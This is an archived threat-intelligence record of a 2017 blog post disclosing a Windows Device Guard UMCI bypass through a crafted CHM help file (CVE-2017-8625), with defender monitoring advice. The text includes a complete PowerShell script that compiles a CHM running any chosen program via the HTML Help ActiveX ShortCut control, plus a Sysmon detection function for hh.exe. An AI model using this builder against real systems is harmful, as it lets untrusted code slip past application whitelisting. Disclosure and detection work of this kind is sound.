{
	"id": "c17cd9b8-b9cb-4a9c-af76-272d7bd80bc6",
	"created_at": "2026-04-06T03:37:07.907662Z",
	"updated_at": "2026-04-10T03:22:06.632557Z",
	"deleted_at": null,
	"sha1_hash": "83dbe7465075428f482c9586feb4359b29900e87",
	"title": "Bypassing Device guard UMCI using CHM – CVE-2017-8625",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 161700,
	"plain_text": "Bypassing Device guard UMCI using CHM – CVE-2017-8625\r\nPublished: 2017-08-13 · Archived: 2026-04-06 02:59:50 UTC\r\nTL;DR\r\nYou could/can bypass Device Guard user mode code integrity (UMCI) with a custom CHM file and execute code.\r\nOver the last 6 months I have done some security research in my (little) spare time, because I find it very interesting. During this time, I was lucky enough to find another valid Device Guard UMCI bypass (I found the bginfo.exe bypass as well: https://oddvar.moe/2017/05/18/bypassing-application-whitelisting-with-bginfo/) and reported it to the Microsoft Security Response Center (secure@microsoft.com).\r\nAfter a dialog with MSRC they told me that this had already been discovered by another security researcher and that it would become a CVE with my name on it as well. (This was big news to me.)\r\nMSRC could not tell me who the other researcher was, but Matt Graeber knew (love that guy). The other researcher was Matt Nelson, and he had found this bypass a while back. Awesome!\r\nAnyway, this blog post looks at how I made the discovery and shows some PoC code as well.\r\nI am not a hardcore reverse engineer (yet), so I will not do a full disassembly tour of the fix Microsoft has made, but will rather focus on how I found this.\r\nFor me this discovery started as I was looking through the binary files in the Windows and System32 folders. I do this from time to time to discover new stuff.\r\nI stumbled upon a binary called hh.exe.\r\nI went on and ran “hh.exe /?”, assuming I would either get some help on the command or an error. Well, that is not what happened.\r\nI got this instead:\r\nThis triggered my curiosity to the max. This trick, by the way, still works on the latest Windows 10, and I guess if you ever need an Explorer window in a locked-down environment (Terminal Server etc.) this could do it.
You could also run, for instance, “hh.exe c:”.\r\nAfter trying a lot of different stuff, I realized you could also browse the internet through hh.exe. Just typing “hh.exe http://www.google.com” proves this. (Still works in the latest Windows 10.)\r\nhttps://oddvar.moe/2017/08/13/bypassing-device-guard-umci-using-chm-cve-2017-8625/\r\nIt looks like this:\r\nThe first thing that came to mind was to check the integrity level of the hh.exe process, and guess what…\r\nYeah, my “browser” inside hh.exe is running at Medium integrity, while a normal iexplore.exe process runs at Low. This should make it easier to exploit the browser inside hh.exe, since there is no Protected Mode sandbox to escape. (There is more research to be done here.)\r\nAfter trying a lot of different approaches, I thought I would try to create a custom help file with code inside, since hh.exe is primarily used for displaying help files.\r\nI searched the web for any valid sources for these kinds of projects and stumbled upon this:\r\nhttps://raw.githubusercontent.com/samratashok/nishang/master/Client/Out-CHM.ps1\r\n(thanks to Nikhil “SamratAshok” Mittal)\r\nTo run this script, I first had to download and install the “HTML Help Workshop and Documentation”:\r\nhttp://www.microsoft.com/en-us/download/details.aspx?id=21138\r\nI ended up creating my own version of Nikhil’s script, since I only wanted to prove my PoC and pop a calculator.\r\nMy PoC script can be found here:\r\nhttps://gist.githubusercontent.com/api0cradle/95ae3c7120f16255d94088bd8959f4b2/raw/fa25b85e85bbb64c5cf021adf92b125357086a6f/Genera\r\nThis script generates a simple .CHM that starts calc.exe through ActiveX.
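The following is an added example, not the author’s gist and not Nishang’s Out-CHM itself: a PowerShell script that builds such a CHM the way Out-CHM does, by writing a topic page that embeds the HTML Help ActiveX control (hhctrl.ocx, CLSID adb880a6-d8ff-11cf-9377-00aa003b7a11) with its ShortCut command, writing a minimal .hhp project file next to it, and compiling both with hhc.exe from HTML Help Workshop. The output directory, the hhc.exe location and the file names are assumptions; the payload is calc.exe, as in the post. Run it only on a machine you own, and expect the resulting file to be refused on a host with the CVE-2017-8625 fix installed.

```powershell
# Added example: build a CHM whose default topic launches a program through the
# HTML Help ActiveX shortcut control, in the style of Nishang's Out-CHM.
# Assumptions: HTML Help Workshop is installed at the path below (adjust if not),
# and the output goes to a throwaway folder under %TEMP%.
param(
    [string]$OutputDir = (Join-Path $env:TEMP 'chm-poc'),
    [string]$Command   = 'calc.exe',
    [string]$HhcPath   = 'C:/Program Files (x86)/HTML Help Workshop/hhc.exe'
)

New-Item -ItemType Directory -Force -Path $OutputDir | Out-Null

# Topic page. The hhctrl.ocx 'ShortCut' command runs an arbitrary program;
# Item1 is ',<program>,<arguments>' and x.Click() fires it with no user action.
$topic = @'
<html><head><title>Help</title></head>
<body>
<object id=x classid='clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11' width=1 height=1>
  <param name='Command' value='ShortCut'>
  <param name='Button' value='Bitmap::shortcut'>
  <param name='Item1' value=',__COMMAND__,'>
  <param name='Item2' value='273,1,1'>
</object>
<script>x.Click();</script>
</body></html>
'@
$topic = $topic.Replace('__COMMAND__', $Command)

# Minimal HTML Help project: one topic, which is also the default topic.
$project = @'
[OPTIONS]
Compatibility=1.1 or later
Compiled file=poc.chm
Default topic=poc.htm
Display compile progress=No
Language=0x409 English (United States)

[FILES]
poc.htm
'@

$hhp = Join-Path $OutputDir 'poc.hhp'
Set-Content -Path (Join-Path $OutputDir 'poc.htm') -Value $topic   -Encoding ASCII
Set-Content -Path $hhp                              -Value $project -Encoding ASCII

if (-not (Test-Path $HhcPath)) {
    throw 'hhc.exe not found; install HTML Help Workshop or pass -HhcPath'
}

# hhc.exe writes poc.chm next to the project file. Its exit code is not a
# reliable success signal, so check for the output file instead.
& $HhcPath $hhp | Out-Null
$chm = Join-Path $OutputDir 'poc.chm'
if (Test-Path $chm) {
    Write-Output ('Built ' + $chm + '; open it with: hh.exe ' + $chm)
} else {
    throw 'hhc.exe did not produce poc.chm; see the compiler output'
}
```

Opening the compiled file with hh.exe is the step that ran the payload on an unpatched, UMCI-enforced host: hh.exe itself is a signed Microsoft binary that the policy allows, and the ShortCut control inside it is what launches the unsigned target.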
There are certainly far more interesting things you can do. For instance, running Cn33liz’s StarFighters to get an Empire agent going: https://github.com/Cn33liz/StarFighters/\r\nThe interesting part of my PoC script is these lines:\r\nThis gif shows you the Device Guard bypass in action:\r\nThis issue is fixed in the Windows 10 Creators Update (v1703, aka Redstone 2), or if you want to patch it on older versions of Windows 10 you can find the correct patch here: https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8625\r\nAfter I updated my machine to v1703 of Windows 10 I got this error when I tried to run the custom CHM file:\r\nFor the defenders out there, I would also monitor hh.exe and look at what the process is doing on your machines; child processes spawned by hh.exe are a good starting point, since a help viewer has no business launching anything. There could be evil stuff going on.\r\nThat’s it. Hope this was interesting to read and that it inspires you to conduct your own security research to make Windows even more secure.
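As an added example for that monitoring advice (not code from the original post), here is a PowerShell function that scores Sysmon process-creation records for the behaviours shown above: hh.exe spawning a child process, hh.exe being pointed at a URL or a drive letter, and a .chm opened from a user-writable location. The records it runs on are constructed sample data carrying the same four fields a Sysmon Event ID 1 event provides (UtcTime, Image, ParentImage, CommandLine); the field names, the list of drop-folder keywords and the sample events are assumptions, and the path separators in the samples are written with forward slashes, which Split-Path accepts on Windows.

```powershell
# Added example (not from the original post): hunt for suspicious hh.exe use in
# Sysmon process-creation (Event ID 1) data. The $sample records below are
# constructed; on a real host build the same objects from
#   Get-WinEvent -FilterHashtable @{ LogName = 'Microsoft-Windows-Sysmon/Operational'; Id = 1 }
# by reading UtcTime, Image, ParentImage and CommandLine out of each event's XML.

function Test-HhExeActivity {
    param([Parameter(Mandatory)][object[]]$Events)

    foreach ($e in $Events) {
        $image  = Split-Path -Leaf $e.Image
        $parent = Split-Path -Leaf $e.ParentImage
        $reason = $null

        if ($parent -ieq 'hh.exe') {
            # A help viewer has no reason to spawn anything. A child of hh.exe is
            # exactly what the ActiveX ShortCut in a malicious CHM produces.
            $reason = 'child process of hh.exe: ' + $image
        }
        elseif ($image -ieq 'hh.exe') {
            # First token is the image; everything after it is the target.
            $target = ($e.CommandLine -split ' ', 2)[1]
            if ($target -match '^(https?:|file:)' -or $target -match '^[A-Za-z]:$') {
                # hh.exe used as a Medium-integrity browser or Explorer replacement.
                $reason = 'hh.exe opened a URL or drive: ' + $target
            }
            elseif ($target -like '*.chm*' -and
                    $target -match '(?i)(downloads|temp|appdata|public)') {
                # Legitimate help files ship under Program Files or Windows,
                # not in user-writable drop locations (assumed keyword list).
                $reason = 'CHM opened from a user-writable path: ' + $target
            }
        }

        if ($reason) {
            [pscustomobject]@{
                UtcTime     = $e.UtcTime
                Reason      = $reason
                CommandLine = $e.CommandLine
            }
        }
    }
}

# Constructed sample events. Separators are written as '/' for brevity;
# Split-Path accepts both separators on Windows.
$sample = @(
    [pscustomobject]@{ UtcTime = '2017-08-13 10:00:01'; Image = 'C:/Windows/hh.exe'
                       ParentImage = 'C:/Windows/explorer.exe'
                       CommandLine = 'hh.exe C:/Program Files/Tool/manual.chm' }
    [pscustomobject]@{ UtcTime = '2017-08-13 10:02:17'; Image = 'C:/Windows/hh.exe'
                       ParentImage = 'C:/Windows/explorer.exe'
                       CommandLine = 'hh.exe C:/Users/bob/Downloads/invoice.chm' }
    [pscustomobject]@{ UtcTime = '2017-08-13 10:02:19'; Image = 'C:/Windows/System32/calc.exe'
                       ParentImage = 'C:/Windows/hh.exe'
                       CommandLine = 'calc.exe' }
    [pscustomobject]@{ UtcTime = '2017-08-13 10:05:00'; Image = 'C:/Windows/hh.exe'
                       ParentImage = 'C:/Windows/cmd.exe'
                       CommandLine = 'hh.exe http://www.google.com' }
)

Test-HhExeActivity -Events $sample | Format-Table -AutoSize
```

The first sample record, a help file under Program Files, is the benign control; the other three model the post’s own observations (a CHM dropped in Downloads, calc.exe as a child of hh.exe, and hh.exe used to browse the web). The child-process rule is the one worth alerting on outright; the path and URL rules are better suited to hunting, since some legacy software still ships CHM help and some users do open it from odd places.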
If you are interested in learning more about Device Guard, I suggest reading Microsoft’s official documentation and some blog posts by Matt Graeber (they have helped me):\r\nhttps://docs.microsoft.com/en-us/windows/device-security/device-guard/device-guard-deployment-guide\r\nhttp://www.exploit-monday.com/2016/09/introduction-to-windows-device-guard.html\r\nhttp://www.exploit-monday.com/2016/09/using-device-guard-to-mitigate-against.html\r\nhttp://www.exploit-monday.com/2016/10/code-integrity-policy-reference.html\r\nhttp://www.exploit-monday.com/2016/11/code-integrity-policy-audit-methodology.html\r\nhttp://www.exploit-monday.com/2016/11/Effectiveness-of-Device-Guard-UMCI.html\r\nhttp://www.exploit-monday.com/2016/12/updating-device-guard-code-integrity.html\r\nRemember to send your discoveries to secure@microsoft.com and do not use your discoveries for evil. #WhiteHat4Life\r\nSource: https://oddvar.moe/2017/08/13/bypassing-device-guard-umci-using-chm-cve-2017-8625/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MITRE"
	],
	"references": [
		"https://oddvar.moe/2017/08/13/bypassing-device-guard-umci-using-chm-cve-2017-8625/"
	],
	"report_names": [
		"bypassing-device-guard-umci-using-chm-cve-2017-8625"
	],
	"threat_actors": [],
	"ts_created_at": 1775446627,
	"ts_updated_at": 1775791326,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/83dbe7465075428f482c9586feb4359b29900e87.pdf",
		"text": "https://archive.orkl.eu/83dbe7465075428f482c9586feb4359b29900e87.txt",
		"img": "https://archive.orkl.eu/83dbe7465075428f482c9586feb4359b29900e87.jpg"
	}
}